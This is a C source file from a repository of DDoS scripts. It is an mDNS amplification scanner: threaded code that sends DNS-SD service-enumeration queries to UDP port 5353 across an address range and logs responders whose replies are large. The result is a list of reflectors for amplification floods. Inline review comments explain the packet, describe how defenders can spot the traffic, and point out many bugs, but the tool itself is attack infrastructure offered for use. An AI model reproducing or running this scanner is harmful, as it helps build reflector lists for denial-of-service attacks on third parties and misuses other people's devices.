R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/DDOS Scripts/AMP Methods/MDNS Amplification/mdns_scanner.c
/* MDNS Amplification scanner, made by -Shroom-, credits to whoever made this scanner source because I have no idea. */
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <sys/time.h>
#include <sys/types.h>
#include <math.h>
#include <ctype.h>
#include <errno.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
/*
 * Shared state. Every counter below is read and written from several threads
 * with plain ++ / += / = and no lock or atomic type. volatile does not make
 * those updates atomic, so the figures on the status line are approximate.
 */
volatile int running_threads = 0;      /* sender threads currently inside flood() */
volatile int found_srvs = 0;           /* replies logged by recievethread() */
volatile unsigned long per_thread = 0; /* number of addresses given to each sender thread */
volatile unsigned long start = 0;      /* first address of the range, as returned by inet_addr() */
volatile unsigned long scanned = 0;    /* probes sent since main() last reset it */
volatile int sleep_between = 0;        /* parsed from argv[5]; never read in the code shown */
volatile int bytes_sent = 0;           /* bytes handed to sendto() since main() last reset it */
volatile unsigned long hosts_done = 0; /* probes sent in total */
FILE *fd;                              /* output list, opened in append mode by main() */

/*
 * The probe datagram: a 12-byte DNS header (ID 0, flags 0, QDCOUNT 1)
 * followed by one question, _services._dns-sd._udp.local, type PTR (0x000C),
 * class IN (0x0001). This is the DNS-SD service-enumeration query, 46 bytes
 * in total, and flood() sends it unicast to UDP port 5353.
 *
 * Defender's view: an mDNS responder that answers this query from an off-link
 * source can be abused as a reflector. RFC 6762 expects responders to ignore
 * queries whose source is not on the local link, and UDP/5353 has no reason
 * to cross a network edge in either direction.
 */
char payload[] =
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x09\x5F\x73\x65\x72\x76\x69\x63\x65\x73\x07\x5F\x64\x6E\x73\x2D\x73\x64\x04\x5F\x75\x64\x70\x05\x6C\x6F\x63\x61\x6C\x00\x00\x0C\x00\x01";

/*
 * NOTE(review): no type is written, so this declaration relies on implicit
 * int. sizeof(payload) also counts the string literal's terminating NUL, so
 * size is 47: the 46-byte query plus one trailing zero byte.
 */
size = sizeof(payload);
/*
 * Sender thread. par1 carries the thread index (an integer passed through
 * the void * argument). The thread sends the fixed global payload once to
 * UDP port 5353 of every address in its slice of the range, walking the
 * addresses in ascending order. It never reads from its socket; replies are
 * picked up separately by recievethread().
 *
 * Defender's view: on the wire this is one source sending identical small
 * UDP datagrams to port 5353 of consecutive addresses, a pattern that flow
 * records and border ACLs on UDP/5353 expose directly.
 */
void *flood(void *par1)
{
    running_threads++;          /* unsynchronised update of a shared counter */
    /* NOTE(review): pointer-to-int cast; truncates where pointers are wider than int */
    int thread_id = (int)par1;
    /* Slice boundaries are computed in host order and stored back in network order. */
    unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
    unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
    unsigned long w;
    int y;                      /* unused */
    unsigned char buf[65536];   /* filled below but never sent or read */
    memset(buf, 0x01, 46);
    int sizeofpayload = 46;     /* unused; sendto() below uses the global size */
    int sock;
    if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
        perror("cant open socket");
        exit(-1);               /* terminates the whole process, not just this thread */
    }
    /*
     * w counts in host byte order. The bound is written htonl(end) where
     * ntohl(end) is meant; the two calls perform the same conversion, so the
     * loop still stops at the end of the slice.
     */
    for(w=ntohl(start_ip);w<htonl(end);w++)
    {
        struct sockaddr_in servaddr;
        bzero(&servaddr, sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_addr.s_addr=htonl(w);
        servaddr.sin_port=htons(5353);
        /* Return value ignored: a failed send is still counted below. */
        sendto(sock,payload,size,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
        bytes_sent+=size;
        scanned++;
        hosts_done++;
    }
    close(sock);
    running_threads--;
    /* NOTE(review): the function is declared void * but returns no value. */
    return;
}
/*
 * SIGINT handler installed by main(): closes the output file, prints a
 * newline and exits with status 0. sig is not used.
 *
 * NOTE(review): fclose(), printf() and exit() are not async-signal-safe, and
 * fd may be in use by recievethread() when the signal arrives, so the last
 * lines of the output file are not guaranteed to be intact.
 */
void sighandler(int sig)
{
    fclose(fd);
    printf("\n");
    exit(0);
}
/*
 * Listener thread. Opens a raw IPv4 socket for protocol UDP and reads
 * datagrams, IP header included, in an endless loop. For each datagram whose
 * UDP source port is 5353 and whose computed body_length exceeds 40, it
 * appends "<source address> <body_length>" to the output file.
 *
 * The only filter is the source port and a length threshold. The body is
 * never parsed, and nothing ties a logged sender to a probe that was actually
 * sent, so any sufficiently long UDP datagram arriving from port 5353 is
 * recorded.
 *
 * NOTE(review): creating a SOCK_RAW socket normally needs elevated privilege
 * (root or CAP_NET_RAW on Linux) - confirm for the target platform.
 */
void *recievethread()
{
    printf("\n");
    /* NOTE(review): recvfrom() takes a socklen_t * for the address length; saddr_size is an int. */
    int saddr_size, data_size, sock_raw;
    struct sockaddr_in saddr;
    struct in_addr in;          /* unused */

    /* NOTE(review): allocation result is not checked and the buffer is never freed. */
    unsigned char *buffer = (unsigned char *)malloc(65536);
    sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
    if(sock_raw < 0)
    {
        printf("Socket Error\n");
        exit(1);
    }
    while(1)
    {
        saddr_size = sizeof saddr;
        data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
        if(data_size <0 )
        {
            printf("Recvfrom error , failed to get packets\n");
            exit(1);
        }
        /* The buffer starts with the IP header of the received datagram. */
        struct iphdr *iph = (struct iphdr*)buffer;
        if(iph->protocol == 17)     /* 17 = UDP */
        {
            /* Header length comes from the packet itself (ihl is in 32-bit words). */
            unsigned short iphdrlen = iph->ihl*4;
            /*
             * NOTE(review): data_size is not compared with iphdrlen plus the
             * UDP header size before udph is read. For a short datagram the
             * port field holds bytes left over from an earlier packet. The
             * read stays inside the 65536-byte allocation.
             */
            struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
            /* Shadows the global payload; computed but never dereferenced. */
            unsigned char* payload = buffer + iphdrlen + 46;
            if(ntohs(udph->source) == 5353)
            {
                /*
                 * Everything after the IP header, minus 46 (the length of the
                 * query sent by flood()). The 8-byte UDP header is not
                 * subtracted, so this is not the exact size of the reply's
                 * answer data.
                 */
                int body_length = data_size - iphdrlen - 46;

                if (body_length > 40)

                {
                    found_srvs++;

                    /* One line per reply; the same address can be logged more than once. */
                    fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
                    fflush(fd);

                }

            }
        }

    }
    /* Unreachable: the loop above has no exit. The function also returns no value. */
    close(sock_raw);

}
/*
 * Entry point. Arguments: range start, range end, output file, thread count,
 * scan delay. Opens the output file for append, starts the listener thread,
 * divides the address range evenly across the sender threads, then redraws a
 * one-line status display once per second until running_threads drops to 0.
 *
 * None of the command-line values is validated; see the notes below.
 */
int main(int argc, char *argv[ ])
{

    if(argc < 6){
        fprintf(stderr, "Invalid parameters!\n");
        fprintf(stdout, "Shrooms MDNS Scanner\nUsage: %s <ip range start (192.0.0.0)> <ip range end (198.255.255.255)> <outfile> <threads> <scan delay in ms>\n", argv[0]);
        exit(-1);
    }
    /* NOTE(review): fopen() result is not checked; a NULL fd reaches fprintf()/fclose() later. */
    fd = fopen(argv[3], "a");
    /* Stored but never read anywhere in the code shown. */
    sleep_between = atoi(argv[5]);

    signal(SIGINT, &sighandler);

    /* NOTE(review): atoi() returns 0 for non-numeric input, and 0 causes a division by zero below. */
    int threads = atoi(argv[4]);
    pthread_t thread;

    pthread_t listenthread;
    /* The listener is started before any probe is sent; its return code is not checked. */
    pthread_create( &listenthread, NULL, &recievethread, NULL);

    /*
     * NOTE(review): both 18-byte allocations are leaked, because the pointers
     * are overwritten with argv[1] and argv[2] on the following lines.
     */
    char *str_start = malloc(18);
    memset(str_start, 0, 18);
    str_start = argv[1];
    char *str_end = malloc(18);
    memset(str_end, 0, 18);
    str_end = argv[2];
    /* inet_addr() failure (INADDR_NONE) is not checked for either address. */
    start = inet_addr(str_start);
    per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
    unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
    int i;
    for(i = 0;i<threads;i++){
        /* The same pthread_t is overwritten on every iteration; the threads are never joined. */
        pthread_create( &thread, NULL, &flood, (void *) i);
    }
    /* Gives the sender threads a second to increment running_threads before it is polled. */
    sleep(1);
    printf("Scan in Progress \n");
    /* Column headings, each padded to 16 characters except the last. */
    char *temp = (char *)malloc(17);
    memset(temp, 0, 17);
    sprintf(temp, "MDNS Found");
    printf("%-16s", temp);
    memset(temp, 0, 17);
    sprintf(temp, "IP/s");
    printf("%-16s", temp);
    memset(temp, 0, 17);
    sprintf(temp, "Bytes/s");
    printf("%-16s", temp);
    memset(temp, 0, 17);
    sprintf(temp, "Threads");
    printf("%-16s", temp);
    memset(temp, 0, 17);
    sprintf(temp, "Percent Done");
    printf("%s", temp);
    printf("\n");

    char *new;
    new = (char *)malloc(16*6);
    while (running_threads > 0)
    {
        printf("\r");
        memset(new, '\0', 16*6);
        /*
         * NOTE(review): each sprintf() below passes new as both destination
         * and "%s" source, which is undefined behaviour for overlapping
         * objects. The conversions also do not match the argument types
         * (%lu with an int, %d with an unsigned long).
         */
        sprintf(new, "%s|%-15lu", new, found_srvs);
        sprintf(new, "%s|%-15d", new, scanned);
        sprintf(new, "%s|%-15d", new, bytes_sent);
        sprintf(new, "%s|%-15d", new, running_threads);
        memset(temp, 0, 17);
        /* toscan is 0 when start and end are equal, making this a division by zero. */
        int percent_done=((double)(hosts_done)/(double)(toscan))*100;
        sprintf(temp, "%d%%", percent_done);
        sprintf(new, "%s|%s", new, temp);
        printf("%s", new);
        fflush(stdout);
        /* Per-second counters are reset after each redraw; the reset races with the senders. */
        bytes_sent=0;
        scanned = 0;
        sleep(1);
    }
    printf("\n");
    /*
     * The listener thread is still running when main() returns, so replies
     * arriving after the last probe may not be recorded.
     */
    fclose(fd);
    return 0;
}